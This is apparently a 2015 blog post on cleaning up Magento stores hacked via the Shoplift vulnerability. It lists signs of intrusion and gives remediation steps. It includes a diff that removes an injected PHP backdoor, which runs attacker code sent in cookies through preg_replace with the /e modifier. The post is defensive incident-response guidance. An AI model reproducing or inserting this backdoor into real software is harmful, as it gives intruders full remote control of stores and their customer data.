JUN 03 2015

Magento recovery after Shoplift vulnerability (post SUPEE-5344)

If your Magento store was not yet patched, it is most likely was already compromised / hacked by automatic exploit that gone wild on April 22, 2015. To the date, almost every not yet patched store I see have all signs of intrusion:

  • lib/Varien/Db/Adapter/Pdo/Mysql.php file modified, so patch can not be applied seamlessly:
    $ bash ./PATCH_SUPEE-5344_CE_1.8.0.0_v1-2015-02-10-08-10-38.sh 
    Checking if patch can be applied/reverted successfully...
    ERROR: Patch can't be applied/reverted successfully.
    patching file app/code/core/Mage/Admin/Model/Observer.php
    patching file app/code/core/Mage/Core/Controller/Request/Http.php
    patching file app/code/core/Mage/Oauth/controllers/Adminhtml/Oauth/AuthorizeController.php
    patching file app/code/core/Mage/XmlConnect/Model/Observer.php
    patching file lib/Varien/Db/Adapter/Pdo/Mysql.php
    Hunk #1 FAILED at 2834.
    1 out of 1 hunk FAILED -- saving rejects to file lib/Varien/Db/Adapter/Pdo/Mysql.php.rej
  • app/code/core/Mage/Cms/controllers/IndexController.php file have a hijacking cookie key installed
  • Magpleasure/Filesystem extensions is installed for easy access to filesystem from Backend
  • List of admin users at System > Permissions > Users is extented by one or several new admin users with email in @example.com domain
  • List of roles at System > Permissions > Roles is extended and full rights are granted to those admins from @example.com
As result, such store can be fully managed in any way the intruder want to with full admin rights to any possible aspect including filesystem access. To prevent your Magento store from abuse, Google ban due to malware or following blocklisting, make sure that your Magento is  patched. For detailed instructions on patching you can refer to this article or Order installation. If your store was compromised / hacked or have any signs of intrusion listed above use the following steps right now to stop it:
  • save a backup of current version
  • prior to patching, rollback lib/Varien/Db/Adapter/Pdo/Mysql.php to original version that corresponds to your Magento distribution or use already patched version from this article
  • rollback app/code/core/Mage/Cms/controllers/IndexController.php to original version, that corresponds to your Magento version or at least delete the following lines there (highlighted):
    --- app/code/core/Mage/Cms/controllers/IndexController.php      2015-04-22 03:47:49.742344082 +0200
    +++ orig-distr-        2015-06-02 10:26:25.197159978 +0200
    @@ -116,14 +116 @@
    -class Mage_Cms_Auth_olx
    -    public function __construct() {
    -        $auth_cookie = @$_COOKIE['nuwxlskmedlvjfdo3'];
    -        if ($auth_cookie) {
    -            $method = $auth_cookie(@$_COOKIE['nuwxlskmedlvjfdo2']);
    -            $auth = $auth_cookie(@$_COOKIE['nuwxlskmedlvjfdo1']);
    -            $method("/124/e",$auth,124);
    -        }
    -    }
    -$is_auth = new Mage_Cms_Auth_olx;
  • delete any unknown users at System > Permissions > Users and revoke their roles at System > Permissions > Roles
  • uninstall or disable Magpleasure/Filesystem extension via Magento connect
Please note, that these actions can recover only from one particular automatic exploitation which we mostly seen on unpatched Magento installations. If intruder actually used the hole to enter to your installation, he could modify any file and leave any other holes for later access, so for detailed investigations, consult security department of your host or restore whole installation from a backup which was made prior to April 22, 2015.  

Posted in: Magento Maintenance

Magento recovery after Shoplift vulnerability (post SUPEE-5344)
84 votes, 4.07 avg. rating (81% score)